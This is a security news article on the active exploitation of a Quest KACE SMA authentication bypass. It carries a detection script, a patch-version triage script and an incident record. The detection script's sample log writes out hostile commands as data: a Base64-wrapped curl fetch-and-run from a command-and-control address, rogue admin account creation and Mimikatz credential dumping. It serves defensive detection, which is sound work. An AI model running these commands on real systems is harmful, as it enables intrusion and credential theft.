Critical Quest KACE SMA Vulnerability Exploited in Active Attacks
Security researchers have uncovered active exploitation of a severe authentication bypass flaw in Quest KACE Systems Management Appliance (SMA), tracked as CVE-2025-32975, allowing attackers to gain full administrative control over vulnerable systems. The vulnerability affects the appliance’s Single Sign-On (SSO) mechanism, enabling threat actors to impersonate legitimate users without credentials.
Quest KACE SMA is widely deployed for endpoint management, including software deployment, patching, and device monitoring, making it a prime target due to its deep integration into enterprise networks. Despite a patch being released in May 2025, many organizations remain unprotected, with exploitation activity first observed the week of March 9, 2026.
Attackers exploit the flaw to bypass authentication, then use the KPluginRunProcess feature to execute remote commands via Base64-encoded payloads. In documented cases, they leveraged curl commands to fetch additional malware from a command-and-control server (216.126.225.156). Persistence is established by abusing runkbot.exe to create rogue administrative accounts and deploying PowerShell scripts (e.g., Enable-UpdateServices.ps1, taskband.ps1) to modify registry settings and maintain access across reboots.
Once inside, attackers harvest credentials using Mimikatz (disguised as asd.exe) and conduct lateral movement via RDP, targeting domain controllers and backup systems (including Veeam and Veritas). This escalation increases risks of data theft, ransomware, or full network compromise.
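The chain above (Base64-wrapped commands through KPluginRunProcess, a curl fetch from the C2 address, runkbot.exe creating accounts, the two PowerShell scripts, and Mimikatz renamed to asd.exe) maps directly onto a handful of detection rules. The following script is an added example written for this page, not code from the researchers or from Quest; it runs those rules over a constructed sample log. The log line format (timestamp, host, key="value" fields) is an assumption made for the example, as is the `net user ... /add` form of the account creation, which the article does not spell out. The one thing worth copying from it is the decode step: indicators hidden inside a Base64 payload are only visible if the scanner decodes the token before matching.

```python
import base64
import re

# Indicators are the ones named in the article above. The log format used for
# the constructed sample below (timestamp, host, key="value" fields) is an
# assumption made for this example; it is not the KACE SMA or Windows event format.
C2_IP = "216.126.225.156"
PERSISTENCE_SCRIPTS = ("enable-updateservices.ps1", "taskband.ps1")

# Runs of the Base64 alphabet long enough to be a command rather than a word.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
# Local account creation. The exact 'net user ... /add' form is an assumption;
# the article only says rogue administrative accounts were created via runkbot.exe.
NET_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+(?:user|localgroup)\b.*\s/add\b")


def decode_b64_tokens(line):
    """Decode every plausible Base64 token in a line so rules can inspect the
    wrapped command. Invalid tokens are skipped; UTF-16LE is tried when the
    bytes contain NULs, which is what PowerShell -EncodedCommand produces."""
    decoded = []
    for tok in B64_TOKEN.findall(line):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if b"\x00" in raw:
            decoded.append(raw.decode("utf-16-le", errors="ignore"))
        else:
            decoded.append(raw.decode("utf-8", errors="ignore"))
    return decoded


def scan_line(line):
    """Return the names of every rule that fires on one log line."""
    low = line.lower()
    decoded = decode_b64_tokens(line)
    # Match against the raw line plus its decoded payloads, so an indicator
    # hidden inside Base64 is still seen.
    view = low + " " + " ".join(d.lower() for d in decoded)

    hits = []
    if C2_IP in view:
        hits.append("c2_address")
    if "kpluginrunprocess" in low and decoded:
        hits.append("kpluginrunprocess_base64")
    if "runkbot.exe" in low and NET_ADD.search(view):
        hits.append("runkbot_account_creation")
    if any(name in view for name in PERSISTENCE_SCRIPTS):
        hits.append("persistence_script")
    if "asd.exe" in low and "sekurlsa" in view:
        hits.append("mimikatz_as_asd")
    return hits


def scan_log(lines):
    """Run every rule over a log; return [(line_index, [rule names])] for lines that fired."""
    findings = []
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed sample log: a stage-2 fetch wrapped in Base64 the way the article
# describes, then the Windows-side persistence and credential-theft steps.
STAGE2_B64 = base64.b64encode(
    f"curl -s http://{C2_IP}/a.sh -o /tmp/a.sh && sh /tmp/a.sh".encode()
).decode()
SAMPLE_LOG = [
    f'2026-03-10T02:11:04Z kace-sma KPluginRunProcess cmd="echo {STAGE2_B64} | base64 -d | sh"',
    '2026-03-10T02:13:27Z host01 parent=runkbot.exe image=net.exe cmdline="net user svc_backup P@ssw0rd! /add"',
    '2026-03-10T02:13:28Z host01 parent=runkbot.exe image=net.exe cmdline="net localgroup administrators svc_backup /add"',
    '2026-03-10T02:15:00Z host01 image=powershell.exe cmdline="powershell -ep bypass -f C:\\ProgramData\\taskband.ps1"',
    '2026-03-10T02:40:12Z host01 image=asd.exe cmdline="asd.exe privilege::debug sekurlsa::logonpasswords"',
    '2026-03-10T02:41:00Z host01 image=svchost.exe cmdline="svchost.exe -k netsvcs"',
]

if __name__ == "__main__":
    for idx, rules in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(rules)}")
        print("   ", SAMPLE_LOG[idx][:110])
```

The first sample line carries the C2 address only inside the Base64 payload, so a scanner that matches the raw line alone would miss it; the benign svchost line at the end fires nothing. Rules keyed on file names (asd.exe, taskband.ps1) are cheap for the attacker to evade by renaming, which is why the account-creation and decoded-command rules matter more than the name matches.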
Affected versions include 13.0, 13.1, and 13.2, with fixes available in 13.0.385, 13.1.81, and 13.2.183 or later. Newer deployments (14.0, 14.1) require Patch 5 (14.0.341) and Patch 4 (14.1.101), respectively. Researchers also recommend removing KACE SMA from public internet exposure and restricting access via VPNs or secure network boundaries to mitigate risks. The campaign underscores the dangers of unpatched systems and the rapid weaponization of known vulnerabilities.
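Checking an appliance inventory against the build numbers above is the one step that is easy to get wrong: build numbers must be compared numerically, since a string comparison puts 13.2.9 after 13.2.183. The script below is an added example for this page (not Quest's tooling); its fixed-build table is taken from the article, and any branch the article does not list (12.x, 14.2 and later) is reported as unknown rather than assumed safe. The hostnames and version strings in the sample inventory are constructed.

```python
# Fixed builds per release branch, as listed in the article above:
# 13.0 -> 13.0.385, 13.1 -> 13.1.81, 13.2 -> 13.2.183,
# 14.0 -> Patch 5 (14.0.341), 14.1 -> Patch 4 (14.1.101).
FIXED_BUILDS = {
    (13, 0): (13, 0, 385),
    (13, 1): (13, 1, 81),
    (13, 2): (13, 2, 183),
    (14, 0): (14, 0, 341),
    (14, 1): (14, 1, 101),
}


def parse_version(text):
    """Parse 'major.minor.build' into an int tuple; numeric, so 13.2.9 < 13.2.183.
    Raises ValueError on anything else rather than guessing."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised KACE SMA version string: {text!r}")
    return tuple(int(p) for p in parts)


def assess(text):
    """Return 'vulnerable', 'fixed', or 'unknown'.
    Branches the article does not cover are reported as unknown, not assumed safe."""
    major, minor, build = parse_version(text)
    fixed = FIXED_BUILDS.get((major, minor))
    if fixed is None:
        return "unknown"
    return "fixed" if (major, minor, build) >= fixed else "vulnerable"


def triage(inventory):
    """inventory: {hostname: version string}. Returns hosts grouped by status.
    Unparseable versions land in 'unknown' so nothing silently drops out."""
    groups = {"vulnerable": [], "fixed": [], "unknown": []}
    for host, version in inventory.items():
        try:
            status = assess(version)
        except ValueError:
            status = "unknown"
        groups[status].append(host)
    return groups


# Constructed sample inventory (hostnames and versions are made up for the example).
SAMPLE_INVENTORY = {
    "kace-prod": "13.2.183",   # exactly the fixed build
    "kace-dr": "13.2.9",       # lower build; a string compare would call this newer
    "kace-lab": "14.0.340",    # one build short of Patch 5
    "kace-new": "14.1.101",    # Patch 4
    "kace-old": "12.1.177",    # branch not in the article's table
    "kace-odd": "14.0 Patch 5",  # not a build string; do not guess
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status:10s} {', '.join(hosts) or '-'}")
```

Anything in the unknown bucket needs a manual look at the vendor advisory; the point of refusing to classify it is that a patch-state report which quietly marks unlisted branches as clean is worse than one that says it does not know.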
Source: https://cyberpress.org/quest-kace-sma-flaw/
Quest Global cybersecurity rating report: https://www.rankiteo.com/company/quest-global
"id": "QUE1774275950",
"linkid": "quest-global",
"type": "Vulnerability",
"date": "3/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'industry': ['Enterprise', 'IT Management'],
'name': 'Quest KACE SMA Users',
'type': 'Organizations'}],
'attack_vector': 'Exploitation of unpatched vulnerability (CVE-2025-32975)',
'data_breach': {'data_exfiltration': True,
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Credentials',
'Administrative Access']},
'date_detected': '2026-03-09',
'description': 'Security researchers have uncovered active exploitation of a '
'severe authentication bypass flaw in Quest KACE Systems '
'Management Appliance (SMA), tracked as CVE-2025-32975, '
'allowing attackers to gain full administrative control over '
'vulnerable systems. The vulnerability affects the appliance’s '
'Single Sign-On (SSO) mechanism, enabling threat actors to '
'impersonate legitimate users without credentials. Attackers '
'exploit the flaw to bypass authentication, execute remote '
'commands, establish persistence, harvest credentials, and '
'conduct lateral movement via RDP, targeting domain '
'controllers and backup systems.',
'impact': {'data_compromised': True,
'identity_theft_risk': True,
'operational_impact': 'Full administrative control over vulnerable '
'systems',
'systems_affected': ['Endpoint Management Systems',
'Domain Controllers',
'Backup Systems']},
'initial_access_broker': {'backdoors_established': ['Rogue administrative '
'accounts',
'PowerShell scripts'],
'entry_point': 'Exploitation of CVE-2025-32975',
'high_value_targets': ['Domain Controllers',
'Backup Systems']},
'lessons_learned': 'The campaign underscores the dangers of unpatched systems '
'and the rapid weaponization of known vulnerabilities.',
'motivation': ['Data Theft', 'Ransomware', 'Network Compromise'],
'post_incident_analysis': {'corrective_actions': ['Patch management',
'Network access '
'restrictions'],
'root_causes': ['Unpatched vulnerability '
'(CVE-2025-32975)',
'Public exposure of KACE SMA']},
'ransomware': {'data_exfiltration': True},
'recommendations': ['Apply patches immediately',
'Remove KACE SMA from public internet exposure',
'Restrict access via VPNs or secure network boundaries',
'Monitor for lateral movement and credential harvesting'],
'references': [{'source': 'Security Research Report'}],
'response': {'containment_measures': ['Removing KACE SMA from public internet '
'exposure',
'Restricting access via VPNs or secure '
'network boundaries'],
'remediation_measures': ['Applying patches (13.0.385, 13.1.81, '
'13.2.183 or later)',
'Applying Patch 5 (14.0.341) and Patch '
'4 (14.1.101) for newer deployments']},
'title': 'Critical Quest KACE SMA Vulnerability Exploited in Active Attacks',
'type': 'Authentication Bypass',
'vulnerability_exploited': 'CVE-2025-32975'}